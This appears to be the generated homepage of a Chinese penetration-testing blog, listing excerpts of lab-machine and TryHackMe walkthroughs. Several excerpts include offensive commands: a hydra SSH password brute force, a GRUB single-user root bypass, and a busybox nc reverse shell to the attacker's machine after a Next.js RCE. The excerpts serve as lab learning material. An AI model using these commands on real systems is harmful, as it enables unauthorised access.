<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>再努力一点,她是不是就会回来 - cyl-blog</title><meta name="author" content="陈羽琳"><meta name="copyright" content="陈羽琳"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="每天能不能pwn一点">
<meta property="og:type" content="website">
<meta property="og:title" content="再努力一点,她是不是就会回来">
<meta property="og:url" content="https://cyl-love.github.io/index.html">
<meta property="og:site_name" content="再努力一点,她是不是就会回来">
<meta property="og:description" content="每天能不能pwn一点">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cyl-love.github.io/img/1.jpg">
<meta property="article:author" content="陈羽琳">
<meta property="article:tag" content="努力一点">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cyl-love.github.io/img/1.jpg"><script type="application/ld+json">{
"@context": "https://schema.org",
"@type": "WebSite",
"name": "再努力一点,她是不是就会回来",
"url": "https://cyl-love.github.io/"
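}</script>
<link rel="shortcut icon" href="/img/1.jpg">
<link rel="canonical" href="https://cyl-love.github.io/index.html">
<!-- Explicit https: rather than protocol-relative URLs, so these third-party origins are never contacted over plain HTTP, whatever scheme the page itself was opened with. -->
<link rel="preconnect" href="https://cdn.jsdelivr.net">
<link rel="preconnect" href="https://busuanzi.ibruce.info">
<link rel="stylesheet" href="/css/index.css">
<!-- NOTE(review): this third-party stylesheet URL carries no package version and the tag has no integrity attribute, so the bytes served can change without this page changing. Pin an exact version and add integrity + crossorigin once the hash for that version has been computed. The generator meta tag says Hexo, so the durable fix presumably belongs in the theme's CDN settings rather than in this generated file. -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css">
<script>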
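(() => {
  /**
   * Thin localStorage wrapper that stores each value together with an
   * expiry timestamp, as JSON of the form { value, expiry }.
   */
  const saveToLocal = {
    /**
     * Store `value` under `key` for `ttl` days.
     * A falsy `ttl` stores nothing.
     */
    set: (key, value, ttl) => {
      if (!ttl) return
      // ttl is expressed in days; 86400000 ms = 1 day.
      const expiry = Date.now() + ttl * 86400000
      localStorage.setItem(key, JSON.stringify({ value, expiry }))
    },
    /**
     * Return the stored value for `key`, or undefined when the entry is
     * missing, expired, or not in the { value, expiry } shape.
     */
    get: key => {
      const itemStr = localStorage.getItem(key)
      if (!itemStr) return undefined

      // localStorage can be written by any script on this origin (and by the
      // user), so the entry is not guaranteed to be JSON this wrapper wrote.
      // Previously a malformed or `null` entry threw here and aborted the rest
      // of this head script (theme, aside state, Apple detection).
      let item
      try {
        item = JSON.parse(itemStr)
      } catch (e) {
        item = null
      }
      if (item === null || typeof item !== 'object') {
        localStorage.removeItem(key)
        return undefined
      }

      const { value, expiry } = item
      if (Date.now() > expiry) {
        localStorage.removeItem(key)
        return undefined
      }
      return value
    }
  }

  window.btf = {
    saveToLocal,

    /**
     * Append an async script element for `url` to the document head and
     * resolve once it has loaded; reject on load error.
     * Every entry of `attr` is copied onto the element with setAttribute, so a
     * caller can pass attributes such as integrity/crossorigin; nothing here
     * adds or requires them.
     */
    getScript: (url, attr = {}) => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
      script.onload = script.onreadystatechange = () => {
        // readyState is only present on legacy engines; absent means "loaded".
        if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
      }
      script.onerror = reject
      document.head.appendChild(script)
    }),

    /**
     * Append a stylesheet link for `url` (optionally with element id `id`) to
     * the document head and resolve once it has loaded; reject on load error.
     */
    getCSS: (url, id) => new Promise((resolve, reject) => {
      const link = document.createElement('link')
      link.rel = 'stylesheet'
      link.href = url
      if (id) link.id = id
      link.onload = link.onreadystatechange = () => {
        if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
      }
      link.onerror = reject
      document.head.appendChild(link)
    }),

    /**
     * Register `fn` in `parent.globalFn[key]`, under `name` when given,
     * otherwise under the next numeric index.
     */
    addGlobalFn: (key, fn, name = false, parent = window) => {
      // `!false` is a constant, presumably rendered from a build-time theme
      // option; as written, every key starting with 'pjax' is ignored.
      if (!false && key.startsWith('pjax')) return
      const globalFn = parent.globalFn || {}
      globalFn[key] = globalFn[key] || {}
      globalFn[key][name || Object.keys(globalFn[key]).length] = fn
      parent.globalFn = globalFn
    }
  }

  // Set data-theme on the root element and, when the theme-color meta tag
  // exists, update its content to match.
  const applyTheme = (mode, themeColor) => {
    document.documentElement.setAttribute('data-theme', mode)
    const meta = document.querySelector('meta[name="theme-color"]')
    if (meta !== null) {
      meta.setAttribute('content', themeColor)
    }
  }

  const activateDarkMode = () => applyTheme('dark', '#0d0d0d')
  const activateLightMode = () => applyTheme('light', '#ffffff')

  btf.activateDarkMode = activateDarkMode
  btf.activateLightMode = activateLightMode

  // Stored preferences are only compared against fixed strings below; they
  // are never written into the DOM as markup.
  const theme = saveToLocal.get('theme')
  if (theme === 'dark') {
    activateDarkMode()
  } else if (theme === 'light') {
    activateLightMode()
  }

  const asideStatus = saveToLocal.get('aside-status')
  if (asideStatus !== undefined) {
    document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
  }

  // Tag the root element when the user agent string names an Apple device.
  const detectApple = () => {
    if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
      document.documentElement.classList.add('apple')
    }
  }
  detectApple()
})()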
</script><script>const GLOBAL_CONFIG = {
// Properties of the GLOBAL_CONFIG object literal opened on the previous line.
// All values are literals baked into the page; nothing here is computed at runtime.
root: '/',
algolia: undefined,
localSearch: undefined,
translate: undefined,
// Code-highlighting options; the plugin named here is highlight.js.
highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":true},
// User-facing messages: copy succeeded / copy failed / browser not supported.
copy: {
success: '复制成功',
error: '复制失败',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '',
// Relative-date suffixes: just now / minutes ago / hours ago / days ago / months ago.
dateSuffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
// NOTE(review): this is the string 'null', not the null value; presumably how the theme renders a disabled lightbox. Confirm against the consumer.
lightbox: 'null',
Snackbar: undefined,
infinitegrid: {
// Third-party script URL with no package version in the path.
// NOTE(review): where this URL is loaded is not visible in this file; if it is fetched as a script, the request carries no integrity check unless the loader adds one. Confirm, and pin a version.
js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid/dist/infinitegrid.min.js',
// Button label: "load more".
buttonText: '加载更多'
},
isPhotoFigcaption: false,
islazyloadPlugin: false,
isAnchor: false,
percent: {
toc: true,
rightside: false,
},
autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: '再努力一点,她是不是就会回来',
isHighlightShrink: false,
isToc: false,
pageType: 'home'
}</script><meta name="generator" content="Hexo 7.3.0"></head><body><div id="web_bg" style="background-image: url(/img/2.png);"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img text-center"><img src="/img/1.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data text-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">20</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">6</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">6</div></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间线</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="page" id="body-wrap"><header class="full_page" id="page-header" style="background-image: url(/img/2.png);"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><img class="site-icon" src="/img/1.jpg" alt="Logo"><span class="site-name">再努力一点,她是不是就会回来</span></a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间线</span></a></div><div 
class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><span class="site-page"><i class="fas fa-bars fa-fw"></i></span></div></div></nav><div id="site-info"><h1 id="site-title">再努力一点,她是不是就会回来</h1><div id="site_social_icons"><a class="social-icon" href="https://github.com/cyl-love" target="_blank" title="Github"><i class="fab fa-github" style="color: #24292e;"></i></a></div></div><div id="scroll-down"><i class="fas fa-angle-down scroll-down-effects"></i></div></header><main class="layout" id="content-inner"><div class="recent-posts nc" id="recent-posts"><div class="recent-post-items"><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/10268.html" title="TryHackMe之PreSecurity">TryHackMe之PreSecurity</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2026-01-06T03:26:54.000Z" title="发表于 2026-01-06 11:26:54">2026-01-06</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/TryHackMe/">TryHackMe</a></span></div><div class="content">1234本来想来打打tryhackme的靶机,结果被hackpath种草了只收录打tryhackme的部分答案,不涉及知识,tryhackme的知识体系确实很全面友好平台:https://tryhackme.com/视频:https://www.youtube.com/@The_Helpful_Hacker Pre SecurityIntroduction to Cyber SecurityOffensive Security Intro123Which of the following options better represents the process where you simulate a hacker's actions to find 
vulnerabilities in a system?Offensive Security 12gobuster -u http://fakebank.thm -w wordlist.txt dir-u 用于指定我们要扫描的网站, -w 用来遍历一组单词以查找隐藏的页面。 1根据情景输入即可 Defensi...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/47096.html" title="群友靶机之7r1umph">群友靶机之7r1umph</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:56.000Z" title="发表于 2025-12-24 21:06:56">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:12345678910111213靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧是22,80端口 目录扫描 1index.php有一个上传口,/upload和/tmp是可访问文件目录口,/info.php是php的phpinfo,抓包走一遍文件上传逻辑 1文件上传的时候没啥限制,发现上传之后会在upload上但是后缀名加成.dsz,也会出现在/tmp上但是再点击的时候,就显示404,该文件也消失掉了,那思路应该就...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/63247.html" title="群友靶机之5ud0">群友靶机之5ud0</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:46.000Z" title="发表于 2025-12-24 21:06:46">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 
配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 180端口和22端口,80端口是一个Textpattern CMS,过去看看 80端口探测12345访问一下显示无法访问,发现跳转到了textpattern.dsz 那就把放他到hosts当中sudo vim /etc/hosts192.168.44.153 textpattern.dsz 再次访问,可以正常访问了 nday利用1搜索一下Tex...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/34595.html" title="群友靶机之wechat">群友靶机之wechat</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:38.000Z" title="发表于 2025-12-24 21:06:38">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 
按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1经典的22,80端口还提示robots.txt了个1.txt 80端口探测ctf小游戏 1进来一眼看到密码的rsa,直接一把梭就好了 1base64加rot13编码 1有一张没有显示出来的图片,base64解码,string分析获得的图片 12将三部分的解码之后可以获得登录凭证flag{welcome:wlc0mE@660930...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/60187.html" title="群友靶机之Vimer">群友靶机之Vimer</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:31.000Z" title="发表于 2025-12-24 21:06:31">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 
按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 122,80,113端口,113端口泄露了vim用户名,先尝试爆破ssh,再去看看80端口 80端口探测 1是一个vim,没有什么特别的东西 爆破获得用户账号密码12hydra -l vim -P /usr/share/wordlists/rockyou.txt 192.168.44.151 sshvim/000001 ssh连接1ssh vi...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/47936.html" title="群友靶机之victorique">群友靶机之victorique</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:09.000Z" title="发表于 2025-12-24 21:06:09">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 
按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 域名解析12sudo vim /etc/hosts192.168.44.155 victorique.xyz 域名枚举 12sudo vim /etc/hosts192.168.44.155 victorique.xyz gifts.victorique.xyz 服务探测gifts.victorique.xyz1给了账号和密码 ookami/Go...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/32329.html" title="群友靶机之Regex">群友靶机之Regex</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:06:01.000Z" title="发表于 2025-12-24 21:06:01">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 
按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 122,80,5000端口,80端口什么都没有,切入点应该在5000端口上了 服务探测 1进来是一个邮箱验证,目录扫描也没有什么tips点上,常规查看源码发现有一个被注释掉了的邮箱地址,看看有什么用先 1只是单纯的返回了邮箱验证正确,搜regax存在个redos攻击,那么可能验证的邮箱是用的正则匹配,可能存在redos攻击获得报错信息,刚好获得一...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/55978.html" title="群友靶机之React">群友靶机之React</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:05:51.000Z" title="发表于 2025-12-24 21:05:51">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 
按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 180,22,3000端口,在3000端口看到是nextjs最新的 CVE-2025-66478 rce漏洞 nday1为了方便后期实现就反弹shell到kali上面,busybox nc 192.168.44.128 4444 -e bash 123456789101112131415161718192021222324252627282930...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/34438.html" title="群友靶机之Open">群友靶机之Open</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:05:42.000Z" title="发表于 2025-12-24 21:05:42">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:123456789101112靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 
按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧经典的80端口加22端口,但是这里的80端口显示重定向到open.dsz,正常直接访问是访问不到的,做了个域名映射 80端口探测12sudo vim /etc/hosts192.168.44.139 open.dsz 远程文件包含12正常进来之后提示是一个远程文件包含(RFI)测试工具通过http://open@格式进行URL处理 反弹s...</div></div></div><div class="recent-post-item"><div class="recent-post-info no-cover"><a class="article-title" href="/posts/30095.html" title="群友靶机之Monkey">群友靶机之Monkey</a><div class="article-meta-wrap"><span class="post-meta-date"><i class="far fa-calendar-alt"></i><span class="article-meta-label">发表于</span><time datetime="2025-12-24T13:05:11.000Z" title="发表于 2025-12-24 21:05:11">2025-12-24</time></span><span class="article-meta"><span class="article-meta-separator">|</span><i class="fas fa-inbox"></i><a class="article-meta__categories" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/">群友靶机</a></span></div><div class="content">123获取靶机地址:https://maze-sec.com/qq群:660930334 配置:12345678910111213靶机用VirtualBox制作,VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`3. 
按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧是22,80端口 80端口探索 123进来是一个html,在源代码提示了个域名,依旧放到hosts当中8sudo vim /etc/hosts192.168.44.139 open.dsz 目录扫描 1这里出题人对dirsearch进行了限制,扫不出东西,换成gobuster来试试 tip点切入1234出了两个文件,其实bak.zip...</div></div></div></div><nav id="pagination"><div class="pagination"><span class="page-number current">1</span><a class="page-number" href="/page/2/#content-inner">2</a><a class="extend next" rel="next" href="/page/2/#content-inner"><i class="fas fa-chevron-right fa-fw"></i></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="/img/1.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">陈羽琳</div><div class="author-info-description">每天能不能pwn一点</div><div class="site-data"><a href="/archives/"><div class="headline">文章</div><div class="length-num">20</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">6</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">6</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/cyl-love"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons"><a class="social-icon" href="https://github.com/cyl-love" target="_blank" title="Github"><i class="fab fa-github" style="color: #24292e;"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">Love life, always—loveforver in the small.</div></div><div class="sticky_layout"><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a 
class="title" href="/posts/10268.html" title="TryHackMe之PreSecurity">TryHackMe之PreSecurity</a><time datetime="2026-01-06T03:26:54.000Z" title="发表于 2026-01-06 11:26:54">2026-01-06</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/posts/47096.html" title="群友靶机之7r1umph">群友靶机之7r1umph</a><time datetime="2025-12-24T13:06:56.000Z" title="发表于 2025-12-24 21:06:56">2025-12-24</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/posts/63247.html" title="群友靶机之5ud0">群友靶机之5ud0</a><time datetime="2025-12-24T13:06:46.000Z" title="发表于 2025-12-24 21:06:46">2025-12-24</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/posts/34595.html" title="群友靶机之wechat">群友靶机之wechat</a><time datetime="2025-12-24T13:06:38.000Z" title="发表于 2025-12-24 21:06:38">2025-12-24</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/posts/60187.html" title="群友靶机之Vimer">群友靶机之Vimer</a><time datetime="2025-12-24T13:06:31.000Z" title="发表于 2025-12-24 21:06:31">2025-12-24</time></div></div></div></div><div class="card-widget card-categories"><div class="item-headline">
<i class="fas fa-folder-open"></i>
<span>分类</span>
</div>
<ul class="card-category-list" id="aside-cat-list">
<li class="card-category-list-item "><a class="card-category-list-link" href="/categories/TryHackMe/"><span class="card-category-list-name">TryHackMe</span><span class="card-category-list-count">1</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/solar%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E7%B3%BB%E5%88%97/"><span class="card-category-list-name">solar应急响应系列</span><span class="card-category-list-count">1</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E4%B8%80%E4%B8%AA%E7%94%B7%E4%BA%BA%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%94%B9%E5%8F%98%E6%88%91%E7%9A%84%E4%B8%80%E7%94%9F/"><span class="card-category-list-name">一个男人一句话改变我的一生</span><span class="card-category-list-count">3</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E5%81%9A%E6%A2%A6%E9%83%BD%E6%83%B3%E8%BF%9Bvn/"><span class="card-category-list-name">做梦都想进vn</span><span class="card-category-list-count">1</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E7%BE%A4%E5%8F%8B%E9%9D%B6%E6%9C%BA/"><span class="card-category-list-name">群友靶机</span><span class="card-category-list-count">11</span></a></li><li class="card-category-list-item "><a class="card-category-list-link" href="/categories/%E9%87%8D%E7%94%9F%E6%88%91%E8%A6%81%E5%BD%93web%E7%B3%95%E6%89%8B/"><span class="card-category-list-name">重生我要当web糕手</span><span class="card-category-list-count">2</span></a></li>
</ul></div><div class="card-widget card-tags"><div class="item-headline"><i class="fas fa-tags"></i><span>标签</span></div><div class="card-tag-cloud"><a href="/tags/web%E5%AE%89%E5%85%A8/" style="font-size: 1.23em; color: #999ea6">web安全</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 1.1em; color: #999">代码审计</a> <a href="/tags/path/" style="font-size: 1.1em; color: #999">path</a> <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="font-size: 1.5em; color: #99a9bf">渗透测试</a> <a href="/tags/ctf/" style="font-size: 1.37em; color: #99a4b2">ctf</a> <a href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" style="font-size: 1.1em; color: #999">应急响应</a></div></div><div class="card-widget card-archives">
<div class="item-headline">
<i class="fas fa-archive"></i>
<span>归档</span>
</div>
<ul class="card-archive-list">
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2026/01/">
<span class="card-archive-list-date">
一月 2026
</span>
<span class="card-archive-list-count">1</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/12/">
<span class="card-archive-list-date">
十二月 2025
</span>
<span class="card-archive-list-count">12</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/11/">
<span class="card-archive-list-date">
十一月 2025
</span>
<span class="card-archive-list-count">2</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/10/">
<span class="card-archive-list-date">
十月 2025
</span>
<span class="card-archive-list-count">3</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/08/">
<span class="card-archive-list-date">
八月 2025
</span>
<span class="card-archive-list-count">1</span>
</a>
</li>
<li class="card-archive-list-item">
<a class="card-archive-list-link" href="/archives/2025/07/">
<span class="card-archive-list-date">
七月 2025
</span>
<span class="card-archive-list-count">1</span>
</a>
</li>
</ul>
</div><div class="card-widget card-webinfo"><div class="item-headline"><i class="fas fa-chart-line"></i><span>网站信息</span></div><div class="webinfo"><div class="webinfo-item"><div class="item-name">文章数目 :</div><div class="item-count">20</div></div><div class="webinfo-item"><div class="item-name">本站访客数 :</div><div class="item-count" id="busuanzi_value_site_uv"><i class="fa-solid fa-spinner fa-spin"></i></div></div><div class="webinfo-item"><div class="item-name">本站总浏览量 :</div><div class="item-count" id="busuanzi_value_site_pv"><i class="fa-solid fa-spinner fa-spin"></i></div></div><div class="webinfo-item"><div class="item-name">最后更新时间 :</div><div class="item-count" id="last-push-date" data-lastPushDate="2026-01-06T03:29:54.516Z"><i class="fa-solid fa-spinner fa-spin"></i></div></div></div></div></div></div></main><footer id="footer" style="background-image: url(/img/2.png);"><div class="footer-other"><div class="footer-copyright"><span class="copyright">©2025 - 2026 By 陈羽琳</span><span class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo 7.3.0</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly 5.4.0-b3</a></span></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="darkmode" type="button" title="日间和夜间模式切换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div 